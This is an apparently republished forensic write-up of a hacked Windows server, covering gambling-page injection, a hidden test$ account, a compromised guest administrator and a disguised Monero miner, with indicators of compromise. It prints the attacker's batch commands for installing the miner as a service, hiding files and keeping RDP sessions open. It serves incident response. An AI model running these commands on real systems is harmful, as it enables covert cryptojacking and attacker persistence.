How Hackers Hijacked a Server with Hidden Accounts and Crypto‑Mining: A Forensic Walkthrough

Introduction

This article summarizes a recent incident where a customer's server was compromised, showing gambling keywords when accessed by crawlers while normal browsers displayed no such content, indicating classic black‑hat SEO tactics.

Overview

Findings

1) The server hosts gambling information and mining programs, showing that multiple hacker groups have infiltrated it. 2) On 2018‑09‑21 the server was breached and gambling content was added (IP 175.41.27.93). 3) A web shell was planted as early as February 2016. 4) Mining software was installed on 2017‑12‑19. 5) A hidden account test$ was created and a guest account logged in from Ukraine (IP 212.66.52.88) on 2018‑09‑21 14:38.

Investigation Process

Compromise Indicators

In September 2018 the monitoring platform detected gambling pages injected into the website.

System Analysis

The analysis focused on system accounts, processes, open ports, services, startup items, file integrity, and key configuration files.

System Accounts

<code>Administraotr、MYSQL_ZKEYS、test$ 、zhimei、renjian、APP_IWAM_61264026、APP_IWAM_6127201、guest</code>

The

test$

account is clearly hidden; legitimate administrators would not create such an account. Other suspicious accounts (e.g.,

zhimei

,

renjian

) require verification.

Analysis of the administrator group revealed that

guest

was added to the administrators, a typical hacker move.

1) Server was given a hidden test$ account. 2) guest account was added to the administrator group.

Log analysis showed the

guest

account logged in from the Ukrainian IP at the noted time, confirming credential leakage.

Process and Service Analysis

CPU usage was constantly at 100 % due to

SQLServer.exe

consuming all resources.

The executable resides in

C:\ProgramData\MySQL

, a hidden directory containing two batch files and two executables.

Analysis of

Startservice.bat

revealed:

Sets service name to

SystemHost

.

Installs a mining program via Tomcat9 with the command:

Tomcat9 install "%SERVICE_NAME%" SQLServer.exe -o stratum+tcp://pool.minexmr.com:7777–u 49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt 7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F -p x -dbg -1-t 0

Sets process name to

SQLServer.exe

.

Hides all files in the directory with

attrib +h +r %cd%\*.*

.

Modifies registry keys to make RDP sessions never timeout.

Disables forced logoff with

net accounts /forcelogoff:no

.

The companion script

mHi.bat

hides the

C:\ProgramData\MySQL

folder and restricts access to certain files to the SYSTEM group.

Both

SQLServer.exe

and its parent

Tomcat9.exe

act as mining processes; terminating the child alone causes the parent to restart it.

Emergency Response

To stop the mining, first terminate the parent process:

wmic process where Name="Tomcat9.exe" call terminate

Then terminate the child:

wmic process where Name="SQLServer.exe" call terminate

After both are stopped, CPU usage returns to normal.

Open Port Analysis

The server had numerous open ports; screenshots show the full list.

It is recommended to close ports 21, 135, 445, 8080 and evaluate the necessity of any others based on business needs.

Conclusion

The forensic analysis identified the following critical issues:

Hidden account

test$

created.

guest

account added to administrators and compromised from a Ukrainian IP.

Excessive open ports, with several high‑risk ports recommended for closure.

Crypto‑mining software planted on 2017‑12‑19.

Indicators of Compromise (IOC)

IP Addresses

212.66.52.88 175.41.27.93

Malicious URL

http://l5.wang2017.com

Sample MD5 Hashes

70D9E2761B18CB0E4C4051E905F9E7A5 EA9F0B1E88B5E21B9A9D31D5C46E81D7 A3CD992FDDC2300AD8A23AD16FE3725C A8ADE1F8D0D87E4D7A75919EE6B3740F 58A9B144762916FE227AF329F5D384F1 DBBB0ACE277D955833696F06C610DE2E 7F7D78755E070860EFFFD1272F14C7A7 9A5772ED22973DA02A45872BBC3735F2 E276D34B3AE124E8218CBC32B4D341B2 B663F32281526B17A540655EC05EC9EC 0D66C67B8BEC9627B696DEB275862E72 634630797CACCC334EFF054FE6279E91 AB908A995367FF0055DFF903F515B061 5D52847EC2CCC750951EF0765AEEC17B 249D7774648FB1CD309AA23B3F96430B C13D2297D244D398B6A311DDA87DBDC7 C23206B81B06D64933C5FBC24AF69CF6 E14E6B1629ED5079F55B69DF66EDAFD7 8D01D604794D3494CBB31570B1E54182 2A235990DD38A0BCBAF2C4835EB8C0A3 5D568BC15EE4D861583E68B63762C2B1 0D66C67B8BEC9627B696DEB275862E72

Mining Pool

<code>stratum+tcp://pool.minexmr.com:7777</code>

Wallet Address

<code>49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F</code>

The analysis was originally authored by "feiniao" and republished from FreeBuf.COM.